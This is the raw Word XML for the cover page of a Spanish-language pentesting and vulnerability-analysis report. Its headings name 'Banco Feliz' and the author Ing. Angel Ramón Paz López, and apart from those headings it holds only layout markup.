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72C01" w14:textId="16E36E74" w:rsidR="008A4824" w:rsidRDefault="00FB5271" w:rsidP="008A4824">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658239" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0D318426" wp14:editId="338B8670">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>-11430</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-1520825</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7800975" cy="10675620"/>
            <wp:effectExtent l="0" t="0" r="952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ada-Ingenieria-01.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7800975" cy="10675620"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="008A4824">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251666432" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="700301FB" wp14:editId="3569DAA0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-889635</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-912495</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3873500" cy="1571665"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4" name="Imagen 4" descr="Home - Devel Group | Cybersecurity Redefined | Cybersecur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Devel Group | Cybersecurity Redefined | Cybersecurity Servic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5367" cy="157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FF0BD" w14:textId="773645CD" w:rsidR="008A4824" w:rsidRDefault="008A4824" w:rsidP="008A4824">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F235C59" w14:textId="0DD962E2" w:rsidR="008A4824" w:rsidRDefault="008A4824" w:rsidP="008A4824">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A9AAC6E" w14:textId="7CBF6399" w:rsidR="008A4824" w:rsidRDefault="00FB5271" w:rsidP="008A4824">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1BB43102" wp14:editId="0DCC223D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3143923</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>224473</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3173527" cy="1330960"/>
                <wp:effectExtent l="825818" t="0" r="853122"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700001">
                          <a:off x="0" y="0"/>
                          <a:ext cx="3173527" cy="1330960"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="6350">
                          <a:noFill/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="6AA4D834" w14:textId="531935EA" w:rsidR="008A4824" w:rsidRPr="006E6F51" w:rsidRDefault="006E6F51" w:rsidP="008A4824">
                            <w:pPr>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Times New Roman (Cuerpo en alfa"/>
                                <w:b/>
                                <w:color w:val="44546A" w:themeColor="text2"/>
                                <w:spacing w:val="114"/>
                                <w:sz w:val="52"/>
                                <w:szCs w:val="136"/>
                                <w:lang w:val="es-HN"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="006E6F51">
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Times New Roman (Cuerpo en alfa"/>
                                <w:b/>
                                <w:color w:val="44546A" w:themeColor="text2"/>
                                <w:spacing w:val="114"/>
                                <w:sz w:val="52"/>
                                <w:szCs w:val="136"/>
                                <w:lang w:val="es-HN"/>
                              </w:rPr>
                              <w:t>Pentesting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43102" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
                <v:stroke joinstyle="miter"/>
                <v:path gradientshapeok="t" o:connecttype="rect"/>
              </v:shapetype>
              <v:shape id="Cuadro de texto 1" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;margin-left:247.55pt;margin-top:17.7pt;width:249.9pt;height:104.8pt;rotation:294912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" filled="f" stroked="f" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6AA4D834" w14:textId="531935EA" w:rsidR="008A4824" w:rsidRPr="006E6F51" w:rsidRDefault="006E6F51" w:rsidP="008A4824">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Times New Roman (Cuerpo en alfa"/>
                          <w:b/>
                          <w:color w:val="44546A" w:themeColor="text2"/>
                          <w:spacing w:val="114"/>
                          <w:sz w:val="52"/>
                          <w:szCs w:val="136"/>
                          <w:lang w:val="es-HN"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="006E6F51">
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Times New Roman (Cuerpo en alfa"/>
                          <w:b/>
                          <w:color w:val="44546A" w:themeColor="text2"/>
                          <w:spacing w:val="114"/>
                          <w:sz w:val="52"/>
                          <w:szCs w:val="136"/>
                          <w:lang w:val="es-HN"/>
                        </w:rPr>
                        <w:t>Pentesting</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="090969B3" w14:textId="4D67C896" w:rsidR="008A4824" w:rsidRDefault="008A4824" w:rsidP="008A4824">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4928A476" w14:textId="26A1511C" w:rsidR="008A4824" w:rsidRPr="00BB6396" w:rsidRDefault="00FB5271" w:rsidP="008A4824">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="38D06363" wp14:editId="0B82E9DB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3288665</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>256540</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1828800"/>
                <wp:effectExtent l="0" t="952500" r="0" b="958215"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="2" name="Cuadro de texto 2"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm rot="2632297">
                          <a:off x="0" y="0"/>
                          <a:ext cx="1828800" cy="1828800"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="1AF12C12" w14:textId="19C3DA17" w:rsidR="008A4824" w:rsidRPr="006E6F51" w:rsidRDefault="008A4824" w:rsidP="008A4824">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F51">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BANCO FELIZ</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="09926253" w14:textId="08F23727" w:rsidR="008A4824" w:rsidRPr="006E6F51" w:rsidRDefault="008A4824" w:rsidP="008A4824">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F51">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D06363" id="Cuadro de texto 2" o:spid="_x0000_s1027" type="#_x0000_t202" style="position:absolute;margin-left:258.95pt;margin-top:20.2pt;width:2in;height:2in;rotation:2875170fd;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" filled="f" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w14:paraId="1AF12C12" w14:textId="19C3DA17" w:rsidR="008A4824" w:rsidRPr="006E6F51" w:rsidRDefault="008A4824" w:rsidP="008A4824">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F51">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BANCO FELIZ</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="09926253" w14:textId="08F23727" w:rsidR="008A4824" w:rsidRPr="006E6F51" w:rsidRDefault="008A4824" w:rsidP="008A4824">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F51">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w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="373A11B1" w14:textId="1FE4A2C4" w:rsidR="008A4824" w:rsidRPr="00BB6396" w:rsidRDefault="008A4824" w:rsidP="008A4824"/>
    <w:p w14:paraId="49C59070" w14:textId="215E14B6" w:rsidR="008A4824" w:rsidRPr="00BB6396" w:rsidRDefault="008A4824" w:rsidP="008A4824"/>
    <w:p w14:paraId="3B42EA0F" w14:textId="677C4CF5" w:rsidR="008A4824" w:rsidRPr="00BB6396" w:rsidRDefault="008A4824" w:rsidP="008A4824"/>
    <w:p w14:paraId="111A2555" w14:textId="0557B978" w:rsidR="008A4824" w:rsidRDefault="008A4824" w:rsidP="008A4824">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3316E63A" w14:textId="16B291E0" w:rsidR="008A4824" w:rsidRDefault="008A4824" w:rsidP="008A4824">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2565"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="108B0954" w14:textId="02E39D26" w:rsidR="008A4824" w:rsidRDefault="008A4824" w:rsidP="008A4824">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2565"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40F18F37" w14:textId="1CCB5E1B" w:rsidR="008A4824" w:rsidRDefault="008A4824" w:rsidP="008A4824">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2565"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E101790" w14:textId="7C64AEF6" w:rsidR="008A4824" w:rsidRDefault="008A4824" w:rsidP="008A4824">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2565"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A6495FA" w14:textId="095A56DA" w:rsidR="008A4824" w:rsidRDefault="00FB5271" w:rsidP="008A4824">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2565"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5DF52C07" wp14:editId="33A21D01">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1878965</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>71756</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5940019" cy="528623"/>
                <wp:effectExtent l="0" t="1962150" r="0" b="196723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696829">
                          <a:off x="0" y="0"/>
                          <a:ext cx="5940019" cy="528623"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="6350">
                          <a:noFill/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="4424E828" w14:textId="4D3AA6D5" w:rsidR="008A4824" w:rsidRPr="00BB6396" w:rsidRDefault="008A4824" w:rsidP="008A4824">
                            <w:pPr>
                              <w:rPr>
                                <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:cs="Times New Roman (Cuerpo en alfa"/>
                                <w:b/>
                                <w:color w:val="44546A" w:themeColor="text2"/>
                                <w:spacing w:val="114"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:cs="Times New Roman (Cuerpo en alfa"/>
                                <w:b/>
                                <w:color w:val="44546A" w:themeColor="text2"/>
                                <w:spacing w:val="114"/>
                              </w:rPr>
                              <w:t>Análisis de Vulnerabilidades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52C07" id="Cuadro de texto 7" o:spid="_x0000_s1028" type="#_x0000_t202" style="position:absolute;margin-left:147.95pt;margin-top:5.65pt;width:467.7pt;height:41.6pt;rotation:294565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" filled="f" stroked="f" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="4424E828" w14:textId="4D3AA6D5" w:rsidR="008A4824" w:rsidRPr="00BB6396" w:rsidRDefault="008A4824" w:rsidP="008A4824">
                      <w:pPr>
                        <w:rPr>
                          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:cs="Times New Roman (Cuerpo en alfa"/>
                          <w:b/>
                          <w:color w:val="44546A" w:themeColor="text2"/>
                          <w:spacing w:val="114"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:cs="Times New Roman (Cuerpo en alfa"/>
                          <w:b/>
                          <w:color w:val="44546A" w:themeColor="text2"/>
                          <w:spacing w:val="114"/>
                        </w:rPr>
                        <w:t>Análisis de Vulnerabilidades</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDA672C" w14:textId="3ED31A29" w:rsidR="008A4824" w:rsidRDefault="006E6F51" w:rsidP="008A4824">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2565"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1EE22641" wp14:editId="10B45790">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-940435</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>316230</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4270375" cy="1678305"/>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70375" cy="1678305"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="6350">
                          <a:noFill/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="14D8731A" w14:textId="6D288E1D" w:rsidR="008A4824" w:rsidRPr="00BB6396" w:rsidRDefault="008A4824" w:rsidP="008A4824">
                            <w:pPr>
                              <w:rPr>
                                <w:rFonts w:ascii="Avenir Light" w:hAnsi="Avenir Light"/>
                                <w:b/>
                                <w:bCs/>
                                <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
                                <w:sz w:val="56"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Avenir Light" w:hAnsi="Avenir Light"/>
                                <w:color w:val="FFFFFF"/>
                                <w:sz w:val="56"/>
                              </w:rPr>
                              <w:t xml:space="preserve">INFORME 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22641" id="Cuadro de texto 8" o:spid="_x0000_s1029" type="#_x0000_t202" style="position:absolute;margin-left:-74.05pt;margin-top:24.9pt;width:336.2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" filled="f" stroked="f" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="14D8731A" w14:textId="6D288E1D" w:rsidR="008A4824" w:rsidRPr="00BB6396" w:rsidRDefault="008A4824" w:rsidP="008A4824">
                      <w:pPr>
                        <w:rPr>
                          <w:rFonts w:ascii="Avenir Light" w:hAnsi="Avenir Light"/>
                          <w:b/>
                          <w:bCs/>
                          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
                          <w:sz w:val="56"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Avenir Light" w:hAnsi="Avenir Light"/>
                          <w:color w:val="FFFFFF"/>
                          <w:sz w:val="56"/>
                        </w:rPr>
                        <w:t xml:space="preserve">INFORME DE  </w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B4C42D" w14:textId="2C45B5C0" w:rsidR="008A4824" w:rsidRDefault="008A4824" w:rsidP="008A4824">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2565"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69D6A6DF" w14:textId="36CB8BCE" w:rsidR="008A4824" w:rsidRDefault="008A4824" w:rsidP="008A4824">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2565"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="564AAAA6" wp14:editId="57A3FE67">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-866775</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>393065</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3514725" cy="1678305"/>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4725" cy="1678305"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="6350">
                          <a:noFill/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="5F082DC0" w14:textId="2DD82F47" w:rsidR="008A4824" w:rsidRPr="006E6F51" w:rsidRDefault="008A4824" w:rsidP="006E6F51">
                            <w:pPr>
                              <w:rPr>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                <w:sz w:val="56"/>
                                <w:szCs w:val="56"/>
                                <w:lang w:val="es-HN"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="006E6F51">
                              <w:rPr>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                <w:sz w:val="56"/>
                                <w:szCs w:val="56"/>
                                <w:lang w:val="es-HN"/>
                              </w:rPr>
                              <w:t>ANA</w:t>
                            </w:r>
                            <w:r w:rsidR="006E6F51" w:rsidRPr="006E6F51">
                              <w:rPr>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                <w:sz w:val="56"/>
                                <w:szCs w:val="56"/>
                                <w:lang w:val="es-HN"/>
                              </w:rPr>
                              <w:t>LISIS DE</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="53E453E3" w14:textId="0237B2EF" w:rsidR="006E6F51" w:rsidRPr="006E6F51" w:rsidRDefault="006E6F51" w:rsidP="006E6F51">
                            <w:pPr>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                <w:b/>
                                <w:color w:val="FFFFFF"/>
                                <w:sz w:val="56"/>
                                <w:szCs w:val="56"/>
                                <w:lang w:val="es-HN"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="006E6F51">
                              <w:rPr>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                <w:sz w:val="56"/>
                                <w:szCs w:val="56"/>
                                <w:lang w:val="es-HN"/>
                              </w:rPr>
                              <w:t>VULNERABILIDADES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AAA6" id="Cuadro de texto 9" o:spid="_x0000_s1030" type="#_x0000_t202" style="position:absolute;margin-left:-68.25pt;margin-top:30.95pt;width:276.75pt;height:13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" filled="f" stroked="f" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="5F082DC0" w14:textId="2DD82F47" w:rsidR="008A4824" w:rsidRPr="006E6F51" w:rsidRDefault="008A4824" w:rsidP="006E6F51">
                      <w:pPr>
                        <w:rPr>
                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
                          <w:sz w:val="56"/>
                          <w:szCs w:val="56"/>
                          <w:lang w:val="es-HN"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="006E6F51">
                        <w:rPr>
                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
                          <w:sz w:val="56"/>
                          <w:szCs w:val="56"/>
                          <w:lang w:val="es-HN"/>
                        </w:rPr>
                        <w:t>ANA</w:t>
                      </w:r>
                      <w:r w:rsidR="006E6F51" w:rsidRPr="006E6F51">
                        <w:rPr>
                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
                          <w:sz w:val="56"/>
                          <w:szCs w:val="56"/>
                          <w:lang w:val="es-HN"/>
                        </w:rPr>
                        <w:t>LISIS DE</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="53E453E3" w14:textId="0237B2EF" w:rsidR="006E6F51" w:rsidRPr="006E6F51" w:rsidRDefault="006E6F51" w:rsidP="006E6F51">
                      <w:pPr>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                          <w:b/>
                          <w:color w:val="FFFFFF"/>
                          <w:sz w:val="56"/>
                          <w:szCs w:val="56"/>
                          <w:lang w:val="es-HN"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="006E6F51">
                        <w:rPr>
                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
                          <w:sz w:val="56"/>
                          <w:szCs w:val="56"/>
                          <w:lang w:val="es-HN"/>
                        </w:rPr>
                        <w:t>VULNERABILIDADES</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACC9F83" w14:textId="01568092" w:rsidR="008A4824" w:rsidRDefault="008A4824" w:rsidP="008A4824">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2565"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47105103" w14:textId="264E57BF" w:rsidR="008A4824" w:rsidRDefault="008A4824" w:rsidP="008A4824">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2565"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5800B3A2" w14:textId="0529EC1D" w:rsidR="008A4824" w:rsidRDefault="008A4824" w:rsidP="008A4824">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2565"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DF83BFF" w14:textId="1D1C9ED8" w:rsidR="008A4824" w:rsidRDefault="008A4824" w:rsidP="008A4824">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2565"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27227FED" w14:textId="3F66ECCB" w:rsidR="008A4824" w:rsidRDefault="008A4824" w:rsidP="008A4824">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2565"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71927C37" w14:textId="6A96F73E" w:rsidR="008A4824" w:rsidRDefault="009D05E1" w:rsidP="008A4824">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2565"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3697EFEB" wp14:editId="1D75DBAE">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-937895</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>247650</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3038475" cy="1692998"/>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8475" cy="1692998"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="6350">
                          <a:noFill/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="6132C282" w14:textId="77777777" w:rsidR="008A4824" w:rsidRDefault="008A4824" w:rsidP="008A4824">
                            <w:pPr>
                              <w:rPr>
                                <w:rFonts w:ascii="Avenir Light" w:hAnsi="Avenir Light"/>
                                <w:b/>
                                <w:color w:val="B4C6E7" w:themeColor="accent1" w:themeTint="66"/>
                                <w:sz w:val="32"/>
                                <w:szCs w:val="32"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00BB6396">
                              <w:rPr>
                                <w:rFonts w:ascii="Avenir Light" w:hAnsi="Avenir Light"/>
                                <w:b/>
                                <w:color w:val="B4C6E7" w:themeColor="accent1" w:themeTint="66"/>
                                <w:sz w:val="32"/>
                                <w:szCs w:val="32"/>
                              </w:rPr>
                              <w:t>Desarrollado por:</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="735CDBA7" w14:textId="16394453" w:rsidR="008A4824" w:rsidRPr="00BB6396" w:rsidRDefault="005D4C37" w:rsidP="008A4824">
                            <w:pPr>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                <w:b/>
                                <w:color w:val="B4C6E7" w:themeColor="accent1" w:themeTint="66"/>
                                <w:sz w:val="32"/>
                                <w:szCs w:val="32"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Avenir Light" w:hAnsi="Avenir Light"/>
                                <w:b/>
                                <w:color w:val="B4C6E7" w:themeColor="accent1" w:themeTint="66"/>
                                <w:sz w:val="32"/>
                                <w:szCs w:val="32"/>
                              </w:rPr>
                              <w:t xml:space="preserve">Ing. </w:t>
                            </w:r>
                            <w:r w:rsidR="008A4824" w:rsidRPr="00BB6396">
                              <w:rPr>
                                <w:rFonts w:ascii="Avenir Light" w:hAnsi="Avenir Light"/>
                                <w:b/>
                                <w:color w:val="B4C6E7" w:themeColor="accent1" w:themeTint="66"/>
                                <w:sz w:val="32"/>
                                <w:szCs w:val="32"/>
                              </w:rPr>
                              <w:t>Angel Ramón Paz López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97EFEB" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
                <v:stroke joinstyle="miter"/>
                <v:path gradientshapeok="t" o:connecttype="rect"/>
              </v:shapetype>
              <v:shape id="Cuadro de texto 11" o:spid="_x0000_s1031" type="#_x0000_t202" style="position:absolute;margin-left:-73.85pt;margin-top:19.5pt;width:239.25pt;height:13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" filled="f" stroked="f" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
